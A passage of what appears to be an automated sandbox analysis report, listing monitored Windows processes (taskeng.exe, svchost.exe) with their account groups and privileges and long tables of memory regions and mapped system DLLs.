{98A8289F-9E59-4BAB-8DE3-58D1FD9F9E29} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\\kEecfMwgj:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1341 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1342 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1343 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1344 start_va = 0xd0000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1345 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1346 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1347 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1348 start_va = 0xff7c0000 end_va = 0xff833fff monitored = 0 entry_point = 0xff7cf44c region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 1349 start_va = 0x7feff040000 end_va = 0x7feff040fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1350 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1351 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1352 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1353 start_va = 0x150000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1354 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1355 start_va = 0x7fefcd20000 end_va = 0x7fefcd8bfff monitored = 0 entry_point = 0x7fefcd22780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1356 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1357 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1358 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1359 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1360 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1361 start_va = 0x7fefd420000 end_va = 0x7fefd486fff monitored = 0 entry_point = 0x7fefd42b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1362 start_va = 0x7fefeb60000 end_va = 0x7fefeb6dfff monitored = 0 entry_point = 0x7fefeb61080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1363 start_va = 0x7fefe910000 end_va = 0x7fefe9d8fff monitored = 0 entry_point = 0x7fefe98a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1364 start_va = 0x7fefec70000 end_va = 0x7fefed0efff monitored = 0 entry_point = 0x7fefec725a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1365 start_va = 0x7fefd4e0000 end_va = 0x7fefd6e2fff monitored = 0 entry_point = 0x7fefd503330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1366 start_va = 0x7fefe680000 end_va = 0x7fefe7acfff monitored = 0 entry_point = 0x7fefe6ced50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1367 start_va = 0x7fefeb70000 end_va = 0x7fefec46fff monitored = 0 entry_point = 0x7fefeb73274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1368 start_va = 0x7fefa290000 end_va = 0x7fefa299fff monitored = 0 entry_point = 0x7fefa29260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1369 start_va = 0x7fefc790000 end_va = 0x7fefc7fcfff monitored = 0 entry_point = 0x7fefc791010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1370 start_va = 0x2a0000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1371 start_va = 0x350000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1372 start_va = 0x150000 end_va = 0x178fff monitored = 0 entry_point = 0x151010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1373 start_va = 0x1a0000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1374 start_va = 0x450000 end_va = 0x5d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1375 start_va = 0x150000 end_va = 0x178fff monitored = 0 entry_point = 0x151010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1376 start_va = 0x7feff000000 end_va = 0x7feff02dfff monitored = 0 entry_point = 0x7feff001010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1377 start_va = 0x7fefed10000 end_va = 0x7fefee18fff monitored = 0 entry_point = 0x7fefed11064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1378 start_va = 0x5e0000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 1379 start_va = 0x770000 end_va = 0x1b6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 1380 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskeng.exe.mui" filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui") Thread: id = 77 os_tid = 0xf4c Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x96e9000" os_pid = "0x334" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c5c1" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1388 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1389 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1390 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1391 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1392 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1393 start_va = 0xc0000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1394 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1395 start_va = 0x190000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1396 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1397 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1398 start_va = 0x320000 end_va = 0x32cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1399 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1400 start_va = 0x340000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1401 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1402 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1403 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1404 start_va = 0x470000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1405 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1406 start_va = 0x500000 end_va = 0x501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 1407 start_va = 0x510000 end_va = 0x511fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1408 start_va = 0x520000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1409 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1410 start_va = 0x5b0000 end_va = 0x737fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1411 start_va = 0x740000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 1412 start_va = 0x8d0000 end_va = 0x8d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 1413 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 1414 start_va = 0x8f0000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 1415 start_va = 0x970000 end_va = 0x970fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 1416 start_va = 0xa00000 end_va = 0xa1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rasdlg.dll.mui" filename = "\\Windows\\System32\\en-US\\rasdlg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\rasdlg.dll.mui") Region: id = 1417 start_va = 0xa20000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 1418 start_va = 0xaa0000 end_va = 0xb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 1419 start_va = 0xba0000 end_va = 0xe6efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1420 start_va = 0xe80000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 1421 start_va = 0xf30000 end_va = 0xf3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1422 start_va = 0xf90000 end_va = 0x100ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 1423 start_va = 0x1080000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 1424 start_va = 0x1130000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 1425 start_va = 0x1210000 end_va = 0x128ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 1426 start_va = 0x12c0000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 1427 start_va = 0x1340000 end_va = 0x13bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 1428 start_va = 0x13d0000 end_va = 0x13dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 1429 start_va = 0x14c0000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 1430 start_va = 0x15b0000 end_va = 0x162ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015b0000" filename = "" Region: id = 1431 start_va = 0x1710000 end_va = 0x171ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 1432 start_va = 0x1730000 end_va = 0x17affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 1433 start_va = 0x1870000 end_va = 0x18effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 1434 start_va = 0x1920000 end_va = 0x1a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001920000" filename = "" Region: id = 1435 start_va = 0x1a80000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 1436 start_va = 0x1b00000 end_va = 0x1b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 1437 start_va = 0x1ba0000 end_va = 0x1baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 1438 start_va = 0x1bc0000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 1439 start_va = 0x1c40000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 1440 start_va = 0x1e20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 1441 start_va = 0x1fd0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1442 start_va = 0x1fe0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1443 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1444 start_va = 0x2130000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 1445 start_va = 0x2230000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 1446 start_va = 0x2240000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 1447 start_va = 0x2340000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 1448 start_va = 0x2530000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 1449 start_va = 0x73440000 end_va = 0x73442fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 1450 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1451 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1452 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1453 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1454 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1455 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1456 start_va = 0xffa90000 end_va = 0xffa9afff monitored = 0 entry_point = 0xffa9246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1457 start_va = 0x7fef4710000 end_va = 0x7fef472bfff monitored = 0 entry_point = 0x7fef47111a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1458 start_va = 0x7fef4730000 end_va = 0x7fef4791fff monitored = 0 entry_point = 0x7fef4731198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1459 start_va = 0x7fef47a0000 end_va = 0x7fef47d9fff monitored = 0 entry_point = 0x7fef47a1010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 1460 start_va = 0x7fef47e0000 end_va = 0x7fef48b7fff monitored = 0 entry_point = 0x7fef4848bd0 region_type = mapped_file name = "rasdlg.dll" filename = "\\Windows\\System32\\rasdlg.dll" (normalized: "c:\\windows\\system32\\rasdlg.dll") Region: id = 1461 start_va = 0x7fef48c0000 end_va = 0x7fef491bfff monitored = 0 entry_point = 0x7fef48c8c20 region_type = mapped_file name = "netman.dll" filename = "\\Windows\\System32\\netman.dll" (normalized: "c:\\windows\\system32\\netman.dll") Region: id = 1462 start_va = 0x7fef4b60000 end_va = 0x7fef4deafff monitored = 0 entry_point = 0x7fef4b66f5c region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1463 start_va = 0x7fef8760000 end_va = 0x7fef876bfff monitored = 0 entry_point = 0x7fef876419c region_type = mapped_file name = "apphlpdm.dll" filename = "\\Windows\\System32\\Apphlpdm.dll" (normalized: "c:\\windows\\system32\\apphlpdm.dll") Region: id = 1464 start_va = 0x7fef8770000 end_va = 0x7fef8786fff monitored = 0 entry_point = 0x7fef877d308 region_type = mapped_file name = "portabledeviceconnectapi.dll" filename = "\\Windows\\System32\\PortableDeviceConnectApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll") Region: id = 1465 start_va = 0x7fef87e0000 end_va = 0x7fef885bfff monitored = 0 entry_point = 0x7fef87e11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1466 start_va = 0x7fef8950000 end_va = 0x7fef8a0cfff monitored = 0 entry_point = 0x7fef8951ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 1467 start_va = 0x7fef8f90000 end_va = 0x7fef8ffafff monitored = 0 entry_point = 0x7fef8fd4344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1468 start_va = 0x7fef9000000 end_va = 0x7fef9012fff monitored = 0 entry_point = 0x7fef9001d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1469 start_va = 0x7fef91e0000 end_va = 0x7fef9263fff monitored = 0 entry_point = 0x7fef9231118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 1470 start_va = 0x7fef92e0000 end_va = 0x7fef92edfff monitored = 0 entry_point = 0x7fef92e5500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1471 start_va = 0x7fef92f0000 end_va = 0x7fef9316fff monitored = 0 entry_point = 0x7fef92f11a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1472 start_va = 0x7fef9320000 end_va = 0x7fef93f2fff monitored = 0 entry_point = 0x7fef9398b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1473 start_va = 0x7fef9580000 end_va = 0x7fef95f6fff monitored = 0 entry_point = 0x7fef95be7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1474 start_va = 0x7fef9640000 end_va = 0x7fef9661fff monitored = 0 entry_point = 0x7fef9641020 region_type = mapped_file name = "trkwks.dll" filename = "\\Windows\\System32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll") Region: id = 1475 start_va = 0x7fef9820000 end_va = 0x7fef982ffff monitored = 0 entry_point = 0x7fef9821010 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 1476 start_va = 0x7fef9830000 end_va = 0x7fef9841fff monitored = 0 entry_point = 0x7fef9831050 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 1477 start_va = 0x7fef9850000 end_va = 0x7fef98a6fff monitored = 0 entry_point = 0x7fef9851118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1478 start_va = 0x7fef98b0000 end_va = 0x7fef98e2fff monitored = 0 entry_point = 0x7fef98b101c region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 1479 start_va = 0x7fef98f0000 end_va = 0x7fef9908fff monitored = 0 entry_point = 0x7fef98f2b50 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 1480 start_va = 0x7fefa720000 end_va = 0x7fefa72ffff monitored = 0 entry_point = 0x7fefa7227f0 region_type = mapped_file name = "uxsms.dll" filename = "\\Windows\\System32\\uxsms.dll" (normalized: "c:\\windows\\system32\\uxsms.dll") Region: id = 1481 start_va = 0x7fefa730000 end_va = 0x7fefa73afff monitored = 0 entry_point = 0x7fefa731198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1482 start_va = 0x7fefa740000 end_va = 0x7fefa766fff monitored = 0 entry_point = 0x7fefa7498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1483 start_va = 0x7fefa810000 end_va = 0x7fefa81afff monitored = 0 entry_point = 0x7fefa814f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1484 start_va = 0x7fefa820000 end_va = 0x7fefa82bfff monitored = 0 entry_point = 0x7fefa8215d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1485 start_va = 0x7fefa840000 end_va = 0x7fefa858fff monitored = 0 entry_point = 0x7fefa8411a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1486 start_va = 0x7fefa8a0000 end_va = 0x7fefa8dcfff monitored = 0 entry_point = 0x7fefa8a1b7c region_type = mapped_file name = "mstask.dll" filename = 